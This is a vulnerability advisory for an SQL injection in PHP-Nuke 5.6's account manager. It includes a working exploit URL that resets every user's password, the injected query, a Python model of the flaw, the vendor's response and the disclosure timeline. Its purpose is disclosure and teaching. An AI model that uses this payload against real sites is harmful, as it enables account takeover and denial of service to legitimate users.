I. BACKGROUND
"PHP-Nuke is a news automated system specially designed to be used in Intranets and Internet. The Administrator has total control of his web site, registered users, and he will have in the hand a powerful assembly of tools to maintain an active and 100% interactive web site using databases." More information is available at http://www.phpnuke.org.
II. DESCRIPTION
PHP-Nuke is susceptible to an SQL injection attack that allows an attacker to modify the users table to his or her liking. Any registered user of the target system can launch the attack by feeding certain unfiltered characters to the account manager module (modules.php?name=Your_Account). The attacker can target a specific user or all system users at once. The key is the ability to insert a backslash into the "bio" field: the backslash escapes the quote that should have closed the bio value, so MySQL keeps reading the following column assignments as part of that string until the next unescaped quote, leaving the SQL query open for injection. The following example sets every PHP-Nuke user's password to "1".
Exploitation requires that the attacker log on, open the account manager and determine his or her UID from the source of the page. If the attacker's UID is 2, he or she can launch the attack by requesting the following URL:
modules.php?name=Your_Account&op=saveuser&uid=2&bio=%5c&EditedMessage=no&pass=xxxxx&vpass=xxxxx&newsletter=,+bio=0,+pass=md5(1)/*
The injected query is constructed as follows:
UPDATE nuke_users
SET name = '',
email = '',
femail = '',
url = 'http://',
pass = 'xxxxx',
+--[ bio = '\',
| user_avatar = '',
| user_icq = '',
| user_occ = '',
| user_from = '',
| user_intrest = '',
| user_sig = '',
| user_aim = '',
| user_yim = '',
| user_msnm = '',
+--[ newsletter = ',
bio=0,pass=md5(1)/*' WHERE uid='2'
Everything in the marked area is parsed as one string literal and stored into bio: the escaped quote \' never closes the value, so the literal runs on until the unescaped quote that opens the newsletter value. The text after that quote, bio=0, pass=md5(1), lands outside any string and is executed as two further SET assignments, and the /* opens a comment that swallows the trailing ' WHERE uid='2'. What remains is an UPDATE statement with no WHERE clause, which sets every row of the table (i.e. every user) to a password of MD5(1).
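To make the mechanics above concrete, the following Python model rebuilds the saveuser UPDATE statement the way the advisory shows it (form values dropped straight into quotes) and then lexes the result with the two MySQL rules the attack depends on: a backslash inside a single-quoted literal escapes the next character, and /* outside a literal starts a comment. It is an added example, not PHP-Nuke code. The column order and the attacker's field values are taken from the query and URL above; mysql_escape() is an assumed helper modelled on mysql_escape_string()'s handling of backslashes and quotes, shown only to contrast the unescaped build with an escaped one, and is not the fix the vendor shipped.

```python
"""Model of the PHP-Nuke 5.6 saveuser UPDATE from this advisory (added example,
not PHP-Nuke code). Only the MySQL lexing rules the attack relies on are
modelled: backslash escapes inside single-quoted literals, '' as a quote inside
a literal, and /* opening a comment outside a literal."""

# Column order exactly as in the statement reproduced in the advisory.
FIELD_ORDER = ["name", "email", "femail", "url", "pass", "bio", "user_avatar",
               "user_icq", "user_occ", "user_from", "user_intrest", "user_sig",
               "user_aim", "user_yim", "user_msnm", "newsletter"]

# Form values from the attack URL after URL-decoding (%5c -> backslash, + -> space).
ATTACK_FIELDS = {f: "" for f in FIELD_ORDER}
ATTACK_FIELDS.update({"url": "http://", "pass": "xxxxx", "bio": "\\",
                      "newsletter": ", bio=0, pass=md5(1)/*"})


def mysql_escape(value):
    """Assumed helper modelled on mysql_escape_string(): escape the backslash
    first, then the quote characters and control bytes MySQL treats specially."""
    for raw, esc in (("\\", "\\\\"), ("'", "\\'"), ('"', '\\"'),
                     ("\0", "\\0"), ("\n", "\\n"), ("\r", "\\r")):
        value = value.replace(raw, esc)
    return value


def build_update(fields, uid, escape=None):
    """Assemble the UPDATE as the vulnerable handler did: every value is placed
    between quotes. escape=None reproduces the 5.6 behaviour (no escaping)."""
    esc = escape or (lambda v: v)
    assignments = ", ".join(f"{col} = '{esc(fields[col])}'" for col in FIELD_ORDER)
    return f"UPDATE nuke_users SET {assignments} WHERE uid='{esc(uid)}'"


def scan(sql):
    """Return (literal bodies, code outside literals, offset of a /* comment or None).

    Each literal is replaced by '?' in the returned code so that the SET list
    can be read as MySQL would see it after string delimiting."""
    literals, code, i, n = [], [], 0, len(sql)
    while i < n:
        if sql[i] == "'":
            j, body = i + 1, []
            while j < n:
                if sql[j] == "\\" and j + 1 < n:      # escape: consume both chars
                    body.append(sql[j:j + 2]); j += 2
                elif sql[j:j + 2] == "''":            # doubled quote stays inside
                    body.append("''"); j += 2
                elif sql[j] == "'":                   # unescaped quote closes it
                    break
                else:
                    body.append(sql[j]); j += 1
            literals.append("".join(body))
            code.append("'?'")
            i = j + 1
        elif sql.startswith("/*", i):                 # comment swallows the rest
            return literals, "".join(code), i
        else:
            code.append(sql[i]); i += 1
    return literals, "".join(code), None


def injection_report(fields, uid, escape=None):
    """Describe what MySQL would actually execute for the given form values."""
    sql = build_update(fields, uid, escape)
    literals, code, comment_at = scan(sql)
    bio_index = FIELD_ORDER.index("bio")
    return {
        "statement": sql,
        # The string MySQL would assign to bio, as it delimits the literal.
        "bio_literal": literals[bio_index] if len(literals) > bio_index else None,
        # True only if WHERE is outside every literal and not commented out.
        "where_survives": "WHERE" in code,
        # SET-list text outside any literal: smuggled assignments show up here.
        "code": code,
        "comment_at": comment_at,
    }


if __name__ == "__main__":
    for label, esc in (("unescaped (PHP-Nuke 5.6)", None), ("escaped", mysql_escape)):
        r = injection_report(ATTACK_FIELDS, "2", esc)
        print(f"--- {label}\n{r['statement']}\nbio literal: {r['bio_literal']!r}")
        print(f"WHERE survives: {r['where_survives']}\ncode: {r['code']}")
```

Running the unescaped case shows the bio literal stretching from the escaped quote through "newsletter = ", the stray bio=0, pass=md5(1) sitting in the SET list as code, and no WHERE clause left; with the values escaped, bio simply stores a backslash, newsletter stores the attacker's text verbatim, and the WHERE clause is intact.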
III. ANALYSIS
Exploitation allows an attacker to compromise any other user account on the system, thereby gaining that account's identity and privileges. The attacker can also corrupt the entire users table, effectively denying service to legitimate users.
IV. DETECTION
iDEFENSE Labs successfully tested and exploited this vulnerability in PHP-Nuke 5.6, Unix version. As the described exploit is destructive (it overwrites every user's password), administrators should not test it in a production environment.
V. VENDOR FIX
Francisco Burzi responded:
"PHP-Nuke version 6.0 is not vulnerable to the SQL injection attack...
Latest version is 6.0 and 6.5 under development. Old versions don't have support of any kind; all bug and security fixes apply to the new versions. So, the solution to this security hole is to update the software from 5.6 to the 6.0 version."
VI. CVE INFORMATION
The Mitre Corp.'s Common Vulnerabilities and Exposures (CVE) Project has assigned the identification number CAN-2002-1242 to this issue.
VII. DISCLOSURE TIMELINE
09/17/2002   Issue disclosed to iDEFENSE
09/23/2002   Author notified through submission form
09/23/2002   iDEFENSE clients notified
10/01/2002   iDEFENSE second attempt at PHP-Nuke contact
10/20/2002   iDEFENSE third attempt at PHP-Nuke contact
10/31/2002   Response from Francisco Burzi (nukelite@users.sourceforge.net)
10/31/2002   Coordinated Public Disclosure
VIII. CREDIT
kill9 (kill9@hackers.com) is credited with discovering this vulnerability.